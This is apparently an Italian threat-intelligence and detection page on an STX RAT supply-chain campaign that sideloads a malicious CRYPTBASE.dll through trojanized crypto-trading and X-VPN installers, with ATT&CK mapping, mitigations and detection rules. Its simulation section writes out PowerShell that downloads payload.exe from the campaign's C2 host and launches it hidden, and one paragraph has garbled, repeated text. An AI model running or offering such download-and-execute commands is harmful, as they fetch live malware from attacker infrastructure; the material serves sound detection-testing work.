Da Portafogli Crypto a una VPN da 100M Utenti: All’interno di una Campagna Attiva di Supply Chain STX RAT
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
I ricercatori hanno scoperto una campagna di supply chain attiva in cui un attore di minaccia ha abusato del sideloading DLL con un CRYPTBASE.dll dannoso CRYPTBASE.dll per distribuire il trojan ad accesso remoto STX RAT attraverso installer trojanizzati per software di trading di criptovalute e il client X-VPN. L’operazione si basava su un singolo repository Bitbucket per distribuire i pacchetti infetti e ruotava i domini di comando e controllo sotto la radice supp0v3.com . Attaccando sia gli utenti di strumenti di scambio finanziario sia un servizio VPN ampiamente utilizzato, gli attaccanti si sono posizionati per rubare credenziali e altri dati sensibili su larga scala. I contenuti di rilevamento sono stati aggiornati per coprire il metodo di sideloading condiviso e l’infrastruttura comune.
Indagine
Gli analisti hanno identificato 11 pacchetti dannosi che utilizzavano tutti la stessa catena di sideloading per caricare STX RAT direttamente in memoria. Gli installer trojanizzati erano ospitati in un repository Bitbucket chiamato CRYPTBASE.dll catena di sideloading per caricare STX RAT direttamente in memoria. Gli installer trojanizzati erano ospitati in un repository Bitbucket chiamato amos-trading, e i metadati dei commit hanno collegato l’attività all’alias Leda Elacoate. Dopo l’esposizione pubblica, gli operatori hanno ruotato l’infrastruttura da helloworld.supp0v3.com to welcome.supp0v3.com. L’analisi YARA ha confermato che STX RAT era il payload finale in ogni campione esaminato.
Mitigazione
X-VPN ha affrontato il problema nella versione Windows 77.5.3, che applica un caricamento DLL rigoroso da directory di sistema, esegue la convalida dell’hash DLL all’avvio e applica politiche di caricamento per processo. Bloccare supp0v3.com e i suoi sottodomini al perimetro della rete può interrompere il traffico di comando e controllo. Le organizzazioni dovrebbero anche rafforzare l’igiene del download del software e limitare le installazioni a fonti di fornitori verificate.
Risposta
I difensori dovrebbero avvisare su qualsiasi processo che carica CRYPTBASE.dll da un percorso non di sistema e indagare su segni di esecuzione STX RAT in memoria. La regola YARA STX RAT pubblicata dovrebbe essere distribuita sulle piattaforme EDR, e il traffico HTTPS in uscita verso supp0v3.com dovrebbe essere monitorato da vicino. Tutti i terminali dovrebbero essere aggiornati alla versione X-VPN patchata o avere il software vulnerabile rimosso. La caccia alle minacce dovrebbe anche concentrarsi sul comportamento di caricamento del codice riflessivo associato alla catena di decompressione multi-stadio del malware.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#ccccff classDef operator fill:#ff9900 %% Node definitions tech_supply_chain["<b>Tecnica</b> – <b>T1195.002 Compromissione della catena di approvvigionamento: Compromissione della catena di approvvigionamento del software</b><br/><b>Descrizione</b>: l’attaccante ha iniettato il malizioso CRYPTBASE.dll in installer legittimi ospitati in un repository Bitbucket."] class tech_supply_chain technique dll_cryptbase["<b>File</b> – <b>Nome</b>: CRYPTBASE.dll (maligno)"] class dll_cryptbase file file_installer["<b>File</b> – <b>Nome</b>: Installer Trojanizzato (es. Xu2011VPN, Binance, MEXC)"] class file_installer file tech_user_exec["<b>Tecnica</b> – <b>T1204.002 Esecuzione da parte dell’utente: File dannoso</b><br/><b>Descrizione</b>: le vittime scaricano ed eseguono l’installer trojanizzato."] class tech_user_exec technique tech_masquerade["<b>Tecnica</b> – <b>T1036.008 Mascheramento: File di tipo mascherato</b><br/><b>Descrizione</b>: il pacchetto dannoso è presentato come un installer VPN legittimo o di trading di criptovalute."] class tech_masquerade technique tech_dll_hijack["<b>Tecnica</b> – <b>T1574.001 Deviazione del flusso di esecuzione: DLL</b><br/><b>Descrizione</b>: l’installer carica CRYPTBASE.dll posizionato nella directory del programma, causando il caricamento della DLL dannosa da parte dell’applicazione legittima."] class tech_dll_hijack technique tech_path_intercept["<b>Tecnica</b> – <b>T1574.008 Intercettazione del percorso: Deviazione dell’ordine di ricerca</b><br/><b>Descrizione</b>: l’ordine di ricerca DLL di Windows carica la DLL dell’attaccante prima della copia di sistema."] class tech_path_intercept technique tech_reflective["<b>Tecnica</b> – <b>T1620 Caricamento del codice riflettente</b><br/><b>Descrizione</b>: la DLL dannosa decomprime e inietta il payload STX RAT in memoria utilizzando il caricamento riflettente, senza lasciare artefatti su disco."] class tech_reflective technique tech_embedded["<b>Tecnica</b> – <b>T1027.009 Payloads incorporati</b><br/><b>Descrizione</b>: la DLL contiene una catena di decompressione multi-stadio incorporata e il nucleo STX RAT."] class tech_embedded technique malware_STX["<b>Malware</b> – <b>Nome</b>: STX RAT<br/><b>Funzione</b>: trojan ad accesso remoto che fornisce furto di credenziali ed esfiltrazione di dati."] class malware_STX malware tech_c2["<b>Tecnica</b> – <b>T1071.001 Protocollo Layer Applicazione: Protocolli Web</b><br/><b>Descrizione</b>: il RAT comunica con C2 su HTTPS verso sottodomini di supp0v3.com."] class tech_c2 technique tech_cred_browser["<b>Tecnica</b> – <b>T1555.003 Credenziali dai Browser Web</b><br/><b>Descrizione</b>: STX RAT raccoglie credenziali salvate del browser, token di sessione e dati account di sistema."] class tech_cred_browser technique tech_exfil["<b>Tecnica</b> – <b>T1041 Esfiltrazione tramite C2 Channel</b><br/><b>Descrizione</b>: le credenziali raccolte e i dati di sistema sono esfiltrati tramite lo stesso canale HTTPS C2."] class tech_exfil technique %% Connections tech_supply_chain –>|inietta| dll_cryptbase dll_cryptbase –>|posizionato in| file_installer file_installer –>|scaricato ed eseguito dalla vittima| tech_user_exec tech_user_exec –>|porta a| tech_masquerade tech_masquerade –>|abilita| tech_dll_hijack tech_dll_hijack –>|usa| tech_path_intercept tech_path_intercept –>|consente| tech_reflective tech_reflective –>|carica| malware_STX malware_STX –>|usa| tech_embedded malware_STX –>|comunica via| tech_c2 malware_STX –>|raccoglie| tech_cred_browser tech_cred_browser –>|dati esfiltrati via| tech_exfil "
Flusso di attacco
Rilevamenti
Possibile infiltrazione/Esfiltrazione di dati/C2 tramite servizi/strumenti di terze parti (tramite proxy)
Visualizza
IOC (HashSha256) per rilevare: Dai portafogli crittografici a una VPN da 100 milioni di utenti: All’interno di una campagna attiva di supply chain STX RAT
Visualizza
Rilevamento dell’infrastruttura C2 Supp0v3.com nella campagna STX RAT [Connessione di rete Windows]
Visualizza
Rilevamento del sideloading di CRYPTBASE.dll per distribuire STX RAT [Creazione processi Windows]
Visualizza
Esecuzione di simulazione
Prerequisito: Il controllo pre-volo del Telemetry & Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrazione dell’attacco e comandi:
Un attaccante che ha compromesso un account utente a basso privilegio usa un one-liner di PowerShell per scaricare un payload dannoso dal server C2
helloworld.supp0v3.com. Questo sfrutta T1071.001 (protocollo Web C2) e T1204.002 (esecuzione da parte dell’utente) mentre il payload stesso è offuscato (T1027, T1027.009) e mascherato come eseguibile legittimo (T1036.005/008). La connessione in uscita al dominio dannoso dovrebbe essere catturata dai log del firewall e conseguentemente attivare la regola Sigma.# Scaricare payload dannoso dal dominio C2 Supp0v3 $url = "http://helloworld.supp0v3.com/payload.exe" $out = "$env:TEMPpayload.exe" Invoke-WebRequest -Uri $url -UseBasicParsing -OutFile $out # Eseguire il payload (simulato – crea solo un file dummy) Start-Process -FilePath $out -WindowStyle Hidden -
Script di test di regressione:
# TC-20260609-A1B2C – Simulare connessione C2 STX RAT a helloworld.supp0v3.com try { # Step 1: Preparare payload dummy (evitare esecuzione di malware reale) $payloadPath = "$env:TEMPpayload.exe" Set-Content -Path $payloadPath -Value "Questo è un eseguibile dummy per il test." -Encoding ASCII # Step 2: Simulare richiesta HTTP in uscita al dominio dannoso $c2Url = "http://helloworld.supp0v3.com/payload.exe" Invoke-WebRequest -Uri $c2Url -UseBasicParsing -OutFile $payloadPath # Step 3: "Eseguire" il payload (nessuna esecuzione reale per sicurezza) Write-Host "Esecuzione del payload simulata a $payloadPath" Write-Host "Simulazione completata – controllare SIEM per avvisi." } catch { Write-Error "Simulazione fallita: $_" } -
Comandi di pulizia:
# Rimuovere il payload dummy e qualsiasi file residuo $payloadPath = "$env:TEMPpayload.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "File del payload pulito." } else { Write-Host "Nessun file del payload trovato – nulla da pulire." }